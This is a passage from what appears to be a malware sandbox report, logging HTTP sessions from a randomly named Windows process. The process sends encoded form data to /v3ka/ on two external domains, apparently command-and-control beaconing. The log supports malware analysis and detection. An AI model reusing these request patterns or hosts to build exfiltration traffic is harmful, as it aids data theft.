68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    13192.168.11.3049824194.191.24.38806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:35.300714970 CET739OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.b-r-consulting.ch
                                                                                    Origin: http://www.b-r-consulting.ch
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.b-r-consulting.ch/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 57 5a 37 70 76 55 48 4f 35 6d 57 51 4c 4d 6c 39 79 65 67 44 4d 38 56 79 4d 6c 39 4e 73 73 4a 55 6a 30 73 79 6d 49 61 62 72 33 44 79 59 74 4d 33 6d 34 78 76 50 4d 32 6e 58 6c 65 36 34 6b 74 46 54 62 6e 75 47 41 78 75 53 78 51 35 4f 4d 4a 71 73 58 6d 6d 73 32 72 59 64 68 69 69 6e 36 78 36 55 41 43 78 72 2b 33 4f 48 57 46 32 6e 74 35 65 31 49 58 6e 38 6f 4a 58 74 6e 2f 57 61 54 37 4d 72 4e 7a 50 31 53 7a 38 65 63 34 4d 65 66 79 43 4f 39 33 32 68 39 57 35 75 64 53 2b 34 4f 79 34 2b 76 39 53 38 53 4f 44 52 36 36 79 30 6d 6a 54 30 47 52 32 6b 6a 70 4c 75 71 4a 70 6f 74 66 32 37 41 3d 3d
                                                                                    Data Ascii: c4qx7JIP=WZ7pvUHO5mWQLMl9yegDM8VyMl9NssJUj0symIabr3DyYtM3m4xvPM2nXle64ktFTbnuGAxuSxQ5OMJqsXmms2rYdhiin6x6UACxr+3OHWF2nt5e1IXn8oJXtn/WaT7MrNzP1Sz8ec4MefyCO932h9W5udS+4Oy4+v9S8SODR66y0mjT0GR2kjpLuqJpotf27A==
                                                                                    Mar 18, 2024 15:09:35.489181042 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:09:35 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Encoding: br
                                                                                    Data Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    14192.168.11.3049825194.191.24.38806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:38.013422012 CET759OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.b-r-consulting.ch
                                                                                    Origin: http://www.b-r-consulting.ch
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.b-r-consulting.ch/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 57 5a 37 70 76 55 48 4f 35 6d 57 51 4b 73 35 39 77 39 59 44 45 38 56 31 41 46 39 4e 69 4d 4a 75 6a 30 77 79 6d 4b 32 4c 72 46 33 79 5a 49 77 33 6e 35 78 76 4d 4d 32 6e 46 46 65 7a 33 45 74 53 54 62 6a 63 47 45 31 75 53 78 45 35 4f 49 46 71 73 6b 65 6c 75 6d 72 61 57 42 69 61 34 71 78 36 55 41 43 78 72 2b 7a 6f 48 53 70 32 67 64 4a 65 31 70 58 6d 77 49 4a 57 6f 58 2f 57 65 54 37 49 72 4e 7a 35 31 52 33 57 65 5a 38 4d 65 66 43 43 4a 73 33 78 75 39 57 46 7a 74 53 70 34 65 4f 78 77 65 46 2f 36 46 32 43 61 34 2b 30 38 52 53 4a 70 46 6c 30 33 44 56 6d 79 72 6b 42 71 76 65 74 6d 42 6a 54 41 58 37 46 72 77 42 4c 51 6b 58 67 61 5a 44 43 48 76 77 3d
                                                                                    Data Ascii: c4qx7JIP=WZ7pvUHO5mWQKs59w9YDE8V1AF9NiMJuj0wymK2LrF3yZIw3n5xvMM2nFFez3EtSTbjcGE1uSxE5OIFqskelumraWBia4qx6UACxr+zoHSp2gdJe1pXmwIJWoX/WeT7IrNz51R3WeZ8MefCCJs3xu9WFztSp4eOxweF/6F2Ca4+08RSJpFl03DVmyrkBqvetmBjTAX7FrwBLQkXgaZDCHvw=
                                                                                    Mar 18, 2024 15:09:38.202873945 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:09:38 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Encoding: br
                                                                                    Data Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    15192.168.11.3049826194.191.24.38806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:40.716069937 CET1676OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.b-r-consulting.ch
                                                                                    Origin: http://www.b-r-consulting.ch
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.b-r-consulting.ch/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 57 5a 37 70 76 55 48 4f 35 6d 57 51 4b 73 35 39 77 39 59 44 45 38 56 31 41 46 39 4e 69 4d 4a 75 6a 30 77 79 6d 4b 32 4c 72 46 50 79 59 2b 45 33 6d 61 5a 76 43 73 32 6e 65 46 65 32 33 45 74 71 54 62 62 59 47 42 73 4d 53 30 41 35 50 72 4e 71 71 56 65 6c 6b 6d 72 61 5a 68 69 68 6e 36 78 76 55 41 53 74 72 2b 6a 6f 48 53 70 32 67 62 74 65 68 6f 58 6d 79 49 4a 58 74 6e 2f 61 61 54 36 58 72 4d 57 4d 31 51 43 68 64 71 45 4d 48 2f 53 43 4d 65 66 78 78 4e 57 44 79 74 54 73 34 65 44 70 77 64 78 7a 36 46 71 73 61 2f 79 30 2b 33 62 53 74 55 6c 7a 71 31 52 55 39 70 38 4c 70 73 6d 4e 6e 79 37 4f 4d 33 33 45 76 52 77 72 57 30 66 72 4e 6f 50 6e 55 36 6b 4a 79 7a 52 4e 74 52 52 58 33 50 38 4d 4f 48 2f 44 65 53 47 78 75 4c 35 32 48 43 69 4e 42 79 61 71 65 50 6a 49 52 6b 67 72 71 71 31 73 55 58 43 6a 63 51 38 57 79 77 43 6a 6e 66 34 33 4d 35 69 56 70 73 46 6e 6c 4b 46 72 47 71 31 51 46 44 30 6d 57 7a 4b 44 43 4c 4b 51 69 4c 4f 68 57 53 73 78 49 59 48 63 6e 62 6f 33 57 32 42 38 74 33 73 44 73 73 4c 51 38 50 70 66 6f 6d 46 65 78 6e 67 53 36 61 5a 64 56 66 30 39 36 62 61 72 54 4e 44 2f 57 4f 4c 57 34 78 6b 41 37 4e 6d 5a 53 34 6e 64 4f 30 78 55 6b 38 35 37 69 52 43 4b 43 67 78 71 56 4b 39 30 71 6c 2f 38 55 58 78 30 31 52 70 75 72 64 58 61 76 45 69 30 2b 47 6c 6d 44 41 73 35 75 62 53 4e 42 43 74 46 4b 49 56 68 65 72 6d 49 63 4e 5a 6d 31 63 4d 75 4e 33 2b 59 31 54 6e 47 61 72 59 68 59 34 64 38 46 4b 73 5a 2f 62 33 37 54 77 31 47 4d 57 42 71 6b 59 52 33 55 54 64 4f 4a 62 78 36 6f 71 35 75 57 77 53 69 71 52 67 59 69 78 6e 74 52 6a 75 32 38 32 53 43 51 52 52 59 70 47 70 5a 78 72 73 36 65 48 6c 4b 31 42 79 4a 6d 35 65 42 53 52 6b 41 53 77 59 4f 2b 78 65 30 4b 43 55 2b 56 45 7a 32 36 6e 57 54 65 58 59 6c 5a 76 7a 39 7a 64 6a 32 71 4a 54 78 71 36 45 45 4f 47 59 62 43 55 4c 58 34 47 39 70 4a 55 51 32 37 4a 52 31 31 77 69 2f 79 49 76 63 70 65 74 64 55 4d 50 54 62 50 65 51 45 39 32 32 66 55 2f 41 61 45 76 46 6c 2f 62 6d 59 61 2f 4b 50 49 67 57 31 7a 6d 61 5a 46 66 5a 46 41 39 4a 6d 4e 34 4a 2b 6f 55 6b 55 6d 6e 6a 4d 49 72 42 45 39 39 42 46 48 59 56 6e 42 4f 37 72 61 42 7a 77 53 50 72 43 6a 50 65 4e 37 39 49 77 57 75 6b 67 58 32 37 35 46 47 35 38 72 50 36 61 4a 56 62 5a 7a 73 71 53 79 66 75 4a 46 31 77 70 34 32 52 4e 6c 66 54 59 47 38 4b 37 58 42 48 34 4a 58 53 70 75 6a 54 69 59 37 49 75 58 34 51 39 7a 2b 43 38 4f 74 52 62 47 66 38 6c 49 61 37 70 48 77 76 38 46 6a 44 46 69 6c 31 57 6f 55 63 4a 2b 74 79 58 74 56 44 5a 32 61 51 6f 58 6c 72 46 54 68 79 68 65 45 4e 64 79 6e 63 4b 2f 45 6b 5a 46 68 45 58 38 66 79 58 37 63 71 43 71 48 72 36 47 42 57 6d 74 43 2f 6f 54 78 4b 70 6b 52 63 6f 56 5a 2b 7a 7a 44 5a 77 6b 44 73 46 6f 55 46 71 77 36 38 62 56 2b 32 76 63 6e 35 38 4b 4b 34 4f 48 31 6c 61 55 44 45 34 71 78 4f 78 73 64 74 4f 38 45 2f 54 46 74 4d 37 73 52 6c 56 32 68 68 43 50 6b 55 47 59 39 32 56 67 73 4f 57 77 49 4d 59 61 64 75 45 56 39 36 41 35 6c 37 37 4f 4c 39 55 46 4b 76 36 36 6d 2f 46 62 7a 7a 64 6b 2f 4f 6a 52 68 41 2b 79 51 67 63 4f 4a 38 2b 57 67 53 72 52 79 44 56 7a 79 6e 70 4a 46 4f 55 46 77 78 58 63 79 78 79 4a 2f 73 65 73 36 42 75 57 2f 59 32 62 71 36 6b 76 56 2b 6c 50 4b 43 79 67 69 56 32 7a 78 61 6b 47 39 6c 58 39 65 4e 43 55 50 68 6a 4f 7a 65 52 41 66 70 35 54 58 31 4f 65 33 43 63 69 63 78 49 4c 52 69 2b 41 6c 35 6f 2b 32 45 48 2b 79 43 4f 54 79 51 77 73 65 39 47 44 33 76 39 68 68 41 36 66 4c 7a 4b 4a 4c 64 59 69 6a 74 55 50 35 74 39 34 38 67 79 4b 39 58
                                                                                    Data Ascii: c4qx7JIP=WZ7pvUHO5mWQKs59w9YDE8V1AF9NiMJuj0wymK2LrFPyY+E3maZvCs2neFe23EtqTbbYGBsMS0A5PrNqqVelkmraZhihn6xvUAStr+joHSp2gbtehoXmyIJXtn/aaT6XrMWM1QChdqEMH/SCMefxxNWDytTs4eDpwdxz6Fqsa/y0+3bStUlzq1RU9p8LpsmNny7OM33EvRwrW0frNoPnU6kJyzRNtRRX3P8MOH/DeSGxuL52HCiNByaqePjIRkgrqq1sUXCjcQ8WywCjnf43M5iVpsFnlKFrGq1QFD0mWzKDCLKQiLOhWSsxIYHcnbo3W2B8t3sDssLQ8PpfomFexngS6aZdVf096barTND/WOLW4xkA7NmZS4ndO0xUk857iRCKCgxqVK90ql/8UXx01RpurdXavEi0+GlmDAs5ubSNBCtFKIVhermIcNZm1cMuN3+Y1TnGarYhY4d8FKsZ/b37Tw1GMWBqkYR3UTdOJbx6oq5uWwSiqRgYixntRju282SCQRRYpGpZxrs6eHlK1ByJm5eBSRkASwYO+xe0KCU+VEz26nWTeXYlZvz9zdj2qJTxq6EEOGYbCULX4G9pJUQ27JR11wi/yIvcpetdUMPTbPeQE922fU/AaEvFl/bmYa/KPIgW1zmaZFfZFA9JmN4J+oUkUmnjMIrBE99BFHYVnBO7raBzwSPrCjPeN79IwWukgX275FG58rP6aJVbZzsqSyfuJF1wp42RNlfTYG8K7XBH4JXSpujTiY7IuX4Q9z+C8OtRbGf8lIa7pHwv8FjDFil1WoUcJ+tyXtVDZ2aQoXlrFThyheENdyncK/EkZFhEX8fyX7cqCqHr6GBWmtC/oTxKpkRcoVZ+zzDZwkDsFoUFqw68bV+2vcn58KK4OH1laUDE4qxOxsdtO8E/TFtM7sRlV2hhCPkUGY92VgsOWwIMYaduEV96A5l77OL9UFKv66m/Fbzzdk/OjRhA+yQgcOJ8+WgSrRyDVzynpJFOUFwxXcyxyJ/ses6BuW/Y2bq6kvV+lPKCygiV2zxakG9lX9eNCUPhjOzeRAfp5TX1Oe3CcicxILRi+Al5o+2EH+yCOTyQwse9GD3v9hhA6fLzKJLdYijtUP5t948gyK9X
                                                                                    Mar 18, 2024 15:09:40.904642105 CET376INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:09:40 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Encoding: br
                                                                                    Data Raw: 39 36 0d 0a a1 50 06 00 20 06 cc ab af a4 5b 28 73 84 1c 85 17 6c 79 e0 f0 97 74 45 61 16 24 92 ec 66 03 1b e0 70 18 4f e7 36 76 56 61 06 41 4b c4 87 48 9a 89 51 76 a9 05 c2 05 69 a5 87 9e 01 a1 c6 e9 59 a5 4d 87 32 44 f5 ce 51 0c 4d 5b 71 e4 c1 fc 5c 2f b2 5c 84 f0 1a 81 11 10 df 3f c8 30 3f 58 8b 4d cc 19 57 d1 3f 71 df 58 b9 af dd 58 99 10 1f 72 99 eb 10 57 e3 f3 04 55 cb 8f fe f1 67 4f e3 df bf 71 bb 7f b0 bd e2 e5 0b b6 0c 4a a4 1f 23 00 6e 22 4d 8a 09 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 96P [(slytEa$fpO6vVaAKHQviYM2DQM[q\/\?0?XMW?qXXrWUgOqJ#n"M0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    16192.168.11.3049827194.191.24.38806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:43.418492079 CET463OUTGET /v3ka/?c4qx7JIP=bbTJsjbns1egJ9JPkt58MNAjZkRhgchDkV02q5vokHm6S8Qgk9c4A4/rVALt8kpaWPL/RyZRbRAxNoIAik6Ahn7XchDP755TKRWw96XVZ2F1n8YO16SVy/I=&K4W=bb2HuFjPIN HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.b-r-consulting.ch
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Mar 18, 2024 15:09:43.606676102 CET389INHTTP/1.1 404 Not Found
                                                                                    Server: nginx
                                                                                    Date: Mon, 18 Mar 2024 14:09:43 GMT
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 33 6b 61 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /v3ka/ was not found on this server.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.11.304982884.32.84.32806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:48.984802008 CET754OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 205
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.teenpattimasterapp.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 68 67 54 6c 49 6c 79 43 6a 69 32 78 56 6c 71 6d 57 6d 7a 51 50 66 5a 7a 2f 4b 43 69 78 2f 6b 55 50 6f 62 65 31 31 61 6d 45 58 55 50 56 2f 46 44 51 2f 51 45 51 70 48 49 55 34 4e 4c 66 6d 61 56 78 61 75 33 65 4c 41 33 63 30 51 6b 41 50 47 35 37 72 67 47 6e 6b 54 63 56 4b 62 73 77 66 79 6e 52 42 2f 52 47 70 35 30 38 78 38 6a 47 68 43 58 65 55 38 56 38 37 6e 68 48 4e 65 71 63 5a 5a 4e 53 35 67 42 68 54 76 65 77 43 69 4c 4a 72 7a 6b 33 48 6e 59 79 49 44 2f 54 45 48 72 44 4c 4a 4a 70 54 48 67 65 6d 33 5a 34 6d 50 38 39 79 32 4d 31 63 36 33 62 2b 54 72 54 65 30 54 7a 32 52 50 74 67 3d 3d
                                                                                    Data Ascii: c4qx7JIP=hgTlIlyCji2xVlqmWmzQPfZz/KCix/kUPobe11amEXUPV/FDQ/QEQpHIU4NLfmaVxau3eLA3c0QkAPG57rgGnkTcVKbswfynRB/RGp508x8jGhCXeU8V87nhHNeqcZZNS5gBhTvewCiLJrzk3HnYyID/TEHrDLJJpTHgem3Z4mP89y2M1c63b+TrTe0Tz2RPtg==


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.11.304982984.32.84.32806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:51.666555882 CET774OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 225
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.teenpattimasterapp.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 68 67 54 6c 49 6c 79 43 6a 69 32 78 48 30 61 6d 52 46 4c 51 49 2f 5a 79 7a 71 43 69 36 66 6b 59 50 6f 48 65 31 78 43 50 46 6c 77 50 51 75 31 44 52 39 34 45 54 70 48 49 47 59 4e 4f 52 47 61 65 78 61 71 52 65 4a 55 33 63 33 73 6b 41 4e 65 35 36 61 67 46 6d 30 54 65 4e 36 62 75 76 76 79 6e 52 42 2f 52 47 70 74 65 38 77 55 6a 61 42 53 58 5a 41 51 4b 36 4c 6e 69 47 4e 65 71 58 35 59 45 53 35 67 6e 68 52 4c 30 77 41 4b 4c 4a 75 50 6b 30 53 4c 5a 72 34 43 30 4e 30 47 48 49 62 38 2b 67 51 54 32 50 6e 48 53 2b 44 50 30 31 46 48 57 6f 66 4f 31 49 65 76 47 50 66 5a 37 78 30 51 55 77 70 6d 4a 2b 2b 64 53 6f 52 37 4f 49 5a 4a 68 6a 64 51 4a 2f 53 34 3d
                                                                                    Data Ascii: c4qx7JIP=hgTlIlyCji2xH0amRFLQI/ZyzqCi6fkYPoHe1xCPFlwPQu1DR94ETpHIGYNORGaexaqReJU3c3skANe56agFm0TeN6buvvynRB/RGpte8wUjaBSXZAQK6LniGNeqX5YES5gnhRL0wAKLJuPk0SLZr4C0N0GHIb8+gQT2PnHS+DP01FHWofO1IevGPfZ7x0QUwpmJ++dSoR7OIZJhjdQJ/S4=


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.11.304983084.32.84.32806944C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 15:09:54.337655067 CET1691OUTPOST /v3ka/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.teenpattimasterapp.org
                                                                                    Origin: http://www.teenpattimasterapp.org
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Content-Length: 1141
                                                                                    Cache-Control: max-age=0
                                                                                    Referer: http://www.teenpattimasterapp.org/v3ka/
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                                                                    Data Raw: 63 34 71 78 37 4a 49 50 3d 68 67 54 6c 49 6c 79 43 6a 69 32 78 48 30 61 6d 52 46 4c 51 49 2f 5a 79 7a 71 43 69 36 66 6b 59 50 6f 48 65 31 78 43 50 46 6c 34 50 4d 4d 39 44 51 63 34 45 53 70 48 49 46 59 4e 50 52 47 61 35 78 61 53 4e 65 4a 59 6e 63 78 67 6b 61 75 57 35 7a 49 59 46 6f 30 54 65 52 4b 62 76 77 66 79 2b 52 48 66 56 47 71 56 65 38 77 55 6a 61 44 61 58 4b 30 38 4b 34 4c 6e 68 48 4e 65 6d 63 5a 59 6f 53 35 70 63 68 52 66 4f 77 78 71 4c 4a 50 2f 6b 6b 77 7a 5a 6a 34 43 32 4d 30 47 66 49 62 67 68 67 51 66 51 50 6b 61 46 2b 45 44 30 78 54 62 41 31 76 4b 42 65 63 6d 4f 42 72 4a 59 2b 6e 67 48 37 65 71 31 7a 74 35 66 6f 7a 6a 70 41 4a 52 43 35 65 49 6a 2b 48 49 61 62 61 62 75 4c 75 73 58 6a 55 4b 43 75 50 53 61 33 30 4c 4e 53 4b 31 6c 44 46 33 56 75 70 66 69 4f 49 72 45 72 6c 4a 74 44 4e 32 4d 36 51 6c 4c 63 2f 44 31 44 31 6e 68 50 63 6e 36 32 65 6d 2f 66 74 4c 6b 49 51 77 75 68 48 56 67 43 66 78 37 65 6c 31 74 52 46 74 41 69 31 57 4d 59 56 71 5a 42 46 32 63 50 32 4f 67 47 72 38 77 62 2b 6b 46 6e 73 41 68 56 34 78 41 43 68 45 6d 6e 53 58 4c 72 58 4d 49 63 72 51 78 2f 6d 75 64 2f 61 31 55 76 5a 63 53 48 6a 4a 73 4b 49 41 70 7a 49 69 43 66 69 50 4f 65 2f 4b 63 7a 64 33 53 74 6a 56 69 63 62 37 6f 4b 6c 33 4e 35 57 61 6f 2b 79 30 52 59 63 63 34 45 67 6a 56 45 4a 73 41 48 6d 38 4f 42 51 79 48 54 32 78 6b 70 4a 4e 32 6b 66 6e 47 44 57 4f 39 64 7a 79 41 69 4c 63 4e 59 45 2b 63 62 78 78 52 4b 75 6f 59 55 2b 31 7a 51 38 65 43 49 76 4b 2f 7a 36 62 38 46 31 65 44 5a 32 76 37 2b 55 33 36 4f 46 58 6c 6a 32 76 55 34 63 69 44 66 69 69 61 45 71 73 63 66 6a 44 71 4b 34 6e 71 63 59 55 32 79 79 31 44 67 44 41 6c 31 77 4c 35 49 49 76 6e 6e 55 46 74 4a 76 71 32 48 39 32 65 48 72 45 43 71 36 4d 39 43 70 74 67 4b 45 55 6a 6c 34 69 58 64 48 67 63 31 70 2b 49 67 6a 47 30 2b 72 48 45 56 5a 73 47 6d 48 37 74 66 30 33 41 72 32 78 65 42 6a 71 30 50 51 6d 43 61 79 4d 56 33 6f 56 63 76 4f 37 64 58 32 5a 48 53 51 49 6a 49 50 59 73 59 6f 